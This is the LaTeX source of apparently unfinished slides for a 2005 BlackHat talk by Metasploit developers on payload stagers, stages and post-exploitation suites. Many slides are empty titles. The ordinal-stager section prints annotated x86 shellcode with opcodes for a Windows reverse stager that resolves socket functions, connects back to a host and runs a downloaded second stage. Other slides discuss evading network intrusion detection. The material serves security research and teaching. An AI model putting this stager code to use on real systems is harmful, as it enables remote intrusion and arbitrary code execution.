metasploit-framework/dev/bh/bh05.tex

\documentclass{beamer}
\usepackage{graphicx}
\usepackage{color}

\mode<presentation> { }

\usepackage[english]{babel}
\usepackage[latin1]{inputenc}
\usepackage{times}
\usepackage[T1]{fontenc}
% I think this looks cool, but whateva! - skape
%\usepackage{beamerthemeshadow}

% Love from spoon
\newcommand{\pdfpart}[1]{\label{pdfpart-#1}\pdfbookmark[0]{#1}{pdfpart-#1}\part{#1}}
\newenvironment{sitemize}{\vspace{1mm}\begin{itemize}\itemsep 4pt\small}{\end{itemize}}

% Presentation meta-information
\title{Beyond EIP}
\author[spoonm \& skape] {spoonm \& skape}
\date[BlackHat 2005] {BlackHat, 2005}
\subject{Beyond EIP}

% Add a spacer between each part
\AtBeginPart{\frame{\partpage}}

% Turn off the navigation on the bottom yo
\setbeamertemplate{navigation symbols}{}
% spoon hates berkeley!
%\usetheme[width=2.2cm]{Berkeley}
%\usecolortheme{sidebartab}

\begin{document}

\begin{frame}[t]
  \titlepage
\end{frame}

\part{Introduction}

\section{Introduction}
\begin{frame}[t]
    \frametitle{Who are we?}

    \begin{sitemize}
        \item spoonm
        \begin{sitemize}
            \item Full-time student at a Canadian university
            \item Metasploit developer since late 2003
        \end{sitemize}

        \item skape
        \begin{sitemize}
            \item Lead software developer by day
            \item Independent security researcher by night
            \item Joined the Metasploit project in 2004
        \end{sitemize}
    \end{sitemize}
\end{frame}
\begin{frame}[t]
    \frametitle{What will we discuss?}

    \begin{sitemize}
        \item Payload stagers
        \begin{sitemize}
            \item Windows Ordinal Stagers
            \item PassiveX
            \item Egghunt
        \end{sitemize}

        \pause
        \item Payload stages
        \begin{sitemize}
            \item Library Injection
            \item The Meterpreter
            \item DispatchNinja
        \end{sitemize}

        \pause
        \item Post-exploitation suites
        \begin{sitemize}
            \item Very hot area of research for the Metasploit team
            \item Suites built off of advanced payload research
            \item Client-side APIs create uniform automation interfaces
            \item Primary focus of Metasploit 3.0
        \end{sitemize}
    \end{sitemize}
\end{frame}
\begin{frame}[t]
    \frametitle{Background: the exploitation cycle}

    \begin{sitemize}
        \item \textbf{Pre-exploitation} - Before the attack
        \begin{sitemize}
            \item Find a bug and isolate it
            \item Write the exploit, payloads, and tools
        \end{sitemize}

        \pause
        \item \textbf{Exploitation} - Leveraging the vulnerability
        \begin{sitemize}
            \item Find a vulnerable target
            \item Gather information
            \item Initialize tools and post-exploitation handlers
            \item Launch the exploit
        \end{sitemize}

        \pause
        \item \textbf{Post-exploitation} - Manipulating the target
        \begin{sitemize}
            \item Command shell redirection
            \item Arbitrary command execution
            \item Pivoting
            \item Advanced payload interaction
        \end{sitemize}
    \end{sitemize}
\end{frame}

\pdfpart{Exploitation Technology's State of Affairs}

\section{Pre-exploitation}
\begin{frame}[t]
    \frametitle{Payload encoders}

    \begin{sitemize}
        \item Robust and elegant encoders do exist
        \begin{sitemize}
            \item SkyLined's Alpha2 x86 alphanumeric encoder
            \item Spoonm's high-permutation Shikata Ga Nai
        \end{sitemize}

        \pause
        \item Payload encoders generally taken for granted
        \begin{sitemize}
            \item Most encoders use a static decoder stub
            \item Makes NIDS signatures easy to write
        \end{sitemize}
    \end{sitemize}
\end{frame}

\begin{frame}[t]
    \frametitle{NOP generators}

    \begin{sitemize}
        \item NOP generation hasn't publicly changed much
        \begin{sitemize}
            \item Most PoC exploits use predictable single-byte NOPs (\texttt{0x90}), if any
            \item ADMmutate's NOP generator easily signatured by NIDS (Snort, Fnord)
            \item Not considered an important research topic to most
        \end{sitemize}

        \pause
        \item Still, NIDS continues to play chase the tail
        \begin{sitemize}
            \item The mouse always has the advantage; NIDS is reactive
            \item Advanced NOP generators and encoders push NIDS to its limits
            \item Many protocols can be complex to signature (DCERPC fragmentation)
        \end{sitemize}

        \pause
        \item Metasploit 2.4 released with a wide-distribution
        multi-byte x86 NOP generator (Opty2)
    \end{sitemize}
\end{frame}

\section{Exploitation}
\begin{frame}[t]
    \frametitle{Exploitation techniques}

    \begin{sitemize}
        \item Exploitation techniques have become very mature
        \begin{sitemize}
            \item Linux/BSD/Solaris techniques are largely unchanged
            \item Windows heap overflows can be made more reliable (Oded/Shok)
            \item Windows SEH overwrites make exploitation easy, even on XPSP2
        \end{sitemize}

        \pause
        \item Exploitation vectors have been beaten to death
        \pause
        \item ...so we wont be talking about them
    \end{sitemize}
\end{frame}

\section{Post-exploitation}
\begin{frame}[t]
    \frametitle{Standard payloads}

    \begin{sitemize}
        \item Standard payloads provide the most basic manipulation
        of a target
        \begin{sitemize}
            \item Port-bind command shell
            \item Reverse (connectback) command shell
            \item Arbitrary command execution
        \end{sitemize}

        \pause
        \item Nearly all PoC exploits use standard payloads

        \pause
        \item Command shells have poor automation support
        \begin{sitemize}
            \item Platform dependent intrinsic commands and
            scripting
            \item Reliant on the set of applications installed on the
            machine
            \item Hindered by by chroot jails and host-based ACLs
        \end{sitemize}
    \end{sitemize}
\end{frame}

\begin{frame}[t]
    \frametitle{``Advantage'' payloads}

    \begin{sitemize}
        \item Advantage payloads provide enhanced manipulation of
        hosts, commonly through the native API
        \item Help to reduce the tediousness of writing payloads

        \item Core ST's InlineEgg

        % TODO: Elaborate on InlineEgg
        % TODO: others...
    \end{sitemize}
\end{frame}

\pdfpart{Payload Stagers}

\begin{frame}[t]
    \frametitle{What are payload stagers?}

    \begin{sitemize}
        \item Payload stagers are small stubs that load and execute other
        payloads
        \item The payloads that are executed are known as stages
        \item Stages perform arbitrary tasks, such as spawning a
        shell

        \pause
        \item Stagers are typically network based and follow three
        basic steps
        \begin{sitemize}
            \item Establish connection to attacker (reverse,
            portbind, findsock)
            \item Read in a payload from the connection
            \item Execute a payload with the connection in known a register
        \end{sitemize}

        \pause
        \item The three steps make it so stages are connection method
        independent
        \begin{sitemize}
            \item No need to have command shell payloads for
            reverse, portbind, and findsock
        \end{sitemize}
    \end{sitemize}
\end{frame}

\begin{frame}[t]
    \frametitle{Why are payload stagers useful?}

    \begin{sitemize}
        \item Some vulnerabilities have limited space for the
        initial payload
        \item Typically much smaller than the stages
        they execute
        \item Eliminate the need to re-implement payloads for each
        connection method
    \end{sitemize}
\end{frame}

\section{Windows Ordinal Stagers}
\begin{frame}[t]
    \frametitle{Windows ordinal stagers}

    \begin{sitemize}
        \item Technique from Oded's lightning talk at core04
        \item Uses static ordinals in \texttt{WS2\_32.DLL} to locate symbol
        addresses
        \item Compatible with all versions of Windows
        \item Results in very low-overhead symbol resolution
        \item Facilitates implementation of reverse, portbind, and
        findsock stagers
        \item Leads to very tiny win32 stagers (92 byte reverse, 93
        byte findsock)
        \item Technical write-up at
        \footnotesize{\url{http://www.metasploit.com/users/spoonm/ordinals.txt}}
    \end{sitemize}
\end{frame}

\begin{frame}[t]
    \frametitle{Implementing a reverse ordinal stager}

    \begin{sitemize}
        \item Locate the base address of \texttt{WS2\_32.DLL}
        \begin{sitemize}
            \item Extract the Peb->Ldr pointer
            \item Extract Flink from the InInitOrderModuleList
            \item Loop through loaded modules comparing module names
            \item Module name is stored in unicode, but can be
            partially translated to ANSI in 5 bytes
            \item Once \texttt{WS2\_32.DLL} is found, extract its
            BaseAddress.
        \end{sitemize}

        \pause
        \item Resolve \texttt{socket}, \texttt{connect},
        and \texttt{recv}
        \begin{sitemize}
            \item Use static ordinals to index the address table
        \end{sitemize}

        \pause
        \item Allocate a socket, connect to the attacker,
        and read in the next payload

        \pause
        \item Requires that \texttt{WS2\_32.DLL} already be loaded
        in the target process
    \end{sitemize}

\end{frame}

\begin{frame}[fragile]
    \frametitle{Locating WS2\_32.DLL's base address}

\footnotesize{
    \begin{verbatim}
FC         cld                   ; clear direction (lodsd)
31DB       xor ebx,ebx           ; zero ebx
648B4330   mov eax,[fs:ebx+0x30] ; eax = PEB
8B400C     mov eax,[eax+0xc]     ; eax = PEB->Ldr
8B501C     mov edx,[eax+0x1c]    ; edx = Ldr->InitList.Flink
8B12       mov edx,[edx]         ; edx = LdrModule->Flink
8B7220     mov esi,[edx+0x20]    ; esi = LdrModule->DllName
AD         lodsd                 ; eax = [esi] ; esi += 4
AD         lodsd                 ; eax = [esi] ; esi += 4
4E         dec esi               ; esi--
0306       add eax,[esi]         ; eax = eax + [esi]
                                 ; (4byte unicode->ANSI)
3D32335F32 cmp eax,0x325f3332    ; eax == 2_32?
75EF       jnz 0xd               ; not equal, continue loop

    \end{verbatim}
}
\end{frame}

\begin{frame}[fragile]
    \frametitle{Resolve symbols using static ordinals}

\footnotesize{
    \begin{verbatim}
8B6A08     mov ebp,[edx+0x8]     ; ebp = LdrModule->BaseAddr
8B453C     mov eax,[ebp+0x3c]    ; eax = DosHdr->e_lfanew
8B4C0578   mov ecx,[ebp+eax+0x78]; ecx = Export Directory
8B4C0D1C   mov ecx,[ebp+ecx+0x1c]; ecx = Address Table Rva
01E9       add ecx,ebp           ; ecx += ws2base
8B4158     mov eax,[ecx+0x58]    ; eax = socket rva
01E8       add eax,ebp           ; eax += ws2base
8B713C     mov esi,[ecx+0x3c]    ; eax = recv rva
01EE       add esi,ebp           ; eax += ws2base
03690C     add ebp,[ecx+0xc]     ; ebp += connect rva
    \end{verbatim}
}
\end{frame}

\begin{frame}[fragile]
    \frametitle{Create the socket, connect back, recv, and jump}

\footnotesize{
    \begin{verbatim}
; Use chained call-stacks to save space
; connect returns to recv returns to buffer (fd in edi)
53         push ebx              ; push 0
6A01       push byte +0x1        ; push SOCK_STREAM
6A02       push byte +0x2        ; push AF_INET
FFD0       call eax              ; call socket
97         xchg eax,edi          ; edi = fd
687F000001 push dword 0x100007f  ; push sockaddr_in
68020010E1 push dword 0xe1100002
89E1       mov ecx,esp           ; ecx = &sockaddr_in
53         push ebx              ; push flags (0)
B70C       mov bh,0xc            ; ebx = 0x0c00
53         push ebx              ; push length (0xc00)
51         push ecx              ; push buffer
57         push edi              ; push fd
51         push ecx              ; push buffer
6A10       push byte +0x10       ; push addrlen (16)
51         push ecx              ; push &sockaddr_in
57         push edi              ; push fd
56         push esi              ; push recv
FFE5       jmp ebp               ; call connect
\end{verbatim}
}
\end{frame}

\section{PassiveX}
\begin{frame}[t]
    \frametitle{Overview}
\end{frame}
\begin{frame}[t]
    \frametitle{Implementation}
\end{frame}
\begin{frame}[t]
    \frametitle{Practical use: HTTP tunneling}
\end{frame}
\begin{frame}[t]
    \frametitle{Pros \& cons}
\end{frame}

\section{Egghunt}
\begin{frame}[t]
    \frametitle{Overview}
\end{frame}
\begin{frame}[t]
    \frametitle{Hunting for eggs with SEH}
\end{frame}
\begin{frame}[t]
    \frametitle{Hunting for eggs with system calls}
\end{frame}

\pdfpart{Payload Stages}

\begin{frame}[t]
    \frametitle{What are post-exploitation stages?}
\end{frame}

\section{Library Injection}
\begin{frame}[t]
    \frametitle{Overview}
\end{frame}
\begin{frame}[t]
    \frametitle{Types of library injection}
\end{frame}
\begin{frame}[t]
    \frametitle{In-memory library injection on Windows}
\end{frame}
\begin{frame}[t]
    \frametitle{In-memory library injection on UNIX}
\end{frame}
\begin{frame}[t]
    \frametitle{Library injection in action: VNC}
\end{frame}

\section{Meterpreter}
\begin{frame}[t]
    \frametitle{Overview}
\end{frame}
\begin{frame}[t]
    \frametitle{Design goals}
\end{frame}
\begin{frame}[t]
    \frametitle{Communication protocol specification}
\end{frame}
\begin{frame}[t]
    \frametitle{Client/Server architecture}
\end{frame}
\begin{frame}[t]
    \frametitle{Extension flexibilities}
\end{frame}
\begin{frame}[t]
    \frametitle{Meterpreter extensions in action: Stdapi}
\end{frame}

\section{DispatchNinja}
\begin{frame}[t]
    \frametitle{Cool dN stuff here}
\end{frame}

\pdfpart{Post-Exploitation Suites}

\section{Post-Exploitation Suites}
    \subsection{Motivations \& Goals}

\end{document}